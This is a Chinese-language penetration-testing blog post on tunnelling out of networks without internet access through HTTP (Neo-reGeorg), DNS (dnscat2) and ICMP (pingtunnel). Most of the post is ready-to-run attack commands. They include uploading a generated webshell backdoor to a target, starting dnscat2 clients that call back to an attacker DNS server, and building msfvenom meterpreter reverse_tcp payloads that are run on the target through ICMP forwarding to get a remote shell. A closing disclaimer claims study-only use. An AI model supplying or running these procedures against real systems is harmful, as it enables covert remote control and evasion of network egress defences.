HTTPDNSICMP代理隧道

2024-03-22 1,029 0

应用场景

在不出网的严苛环境下进行渗透时,使用HTTP/DNS/ICMP进行代理隧道连接

HTTP代理(Neo-regGeorg)

1、下载Neo-regGeorg

git clone https://github.com/L-codes/Neo-reGeorg.git

2.攻击机运行neoreg.py

python3 neoreg.py generate -k 123456

3.将生成的后门上传至靶机

4、攻击连接靶机

python3 neoreg.py -k 123456 -u http://192.168.10.132/public/tunnel.php

5.攻击机开启代理即可访问目标机器可访问的机器

DNS隧道(Dnscat2)

一、直接模式

1、安装

(1)服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

#解决bundle install特别慢的问题

修改Gemfile文件中的source如下:

source 'https://gems.ruby-china.com'

(2)客户端编译(在攻击机中编译,将编译好的文件上传至靶机)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

2、启动服务端

ruby ./dnscat2.rb

#53端口占用的解决方法  https://www.itren.org/319.html

3、启动客户端

./dnscat --dns server=192.168.10.131,port=53 --secret=5154a93f3e3adb86f7f4ba015c66337b

二、域名中继模式

1、安装

(1)服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

#解决bundle install特别慢的问题

修改Gemfile文件中的source如下:

source 'https://gems.ruby-china.com'

(2)客户端编译(在攻击机中编译,将编译好的文件上传至靶机)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

2、启动服务端

ruby ./dnscat2.rb ns1.comeonsite.top --secret=shan

3、启动客户端

./dnscat --secret=shan ns1.comeonsite.top

ICMP隧道

1、icmp隧道转发tcp上线msf

(1)将pingtunnel上传至攻击机,并开启服务

./pingtunnel -type server

(2)生成msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 -f exe -o /root/Desktop/6666.exe

(3)将msfvenom上传至靶机

(4)将pingtunnel上传至靶机,并开启转发

./pingtunnel -type client -l 127.0.0.1:6666 -s 192.168.10.131 -t 192.168.10.131:6666 -tcp 1 -noprint 1 -nolog 1

(5)msf开启监听

(6)执行上传的木马,即可获得meterpreter

2、icmp隧道转发socks5上线msf

(1)将pingtunnel上传至攻击机,并开启服务

./pingtunnel -type server

(2)生成msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.131 lport=6666 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6666 -f exe > 8899.exe

(3)将msfvenom上传至靶机

(4)将pingtunnel上传至靶机,并开启转发

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.10.131 -sock5 1 -noprint 1 -nolog 1

(5)msf开启监听

(6)执行上传的木马,即可获得meterpreter


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论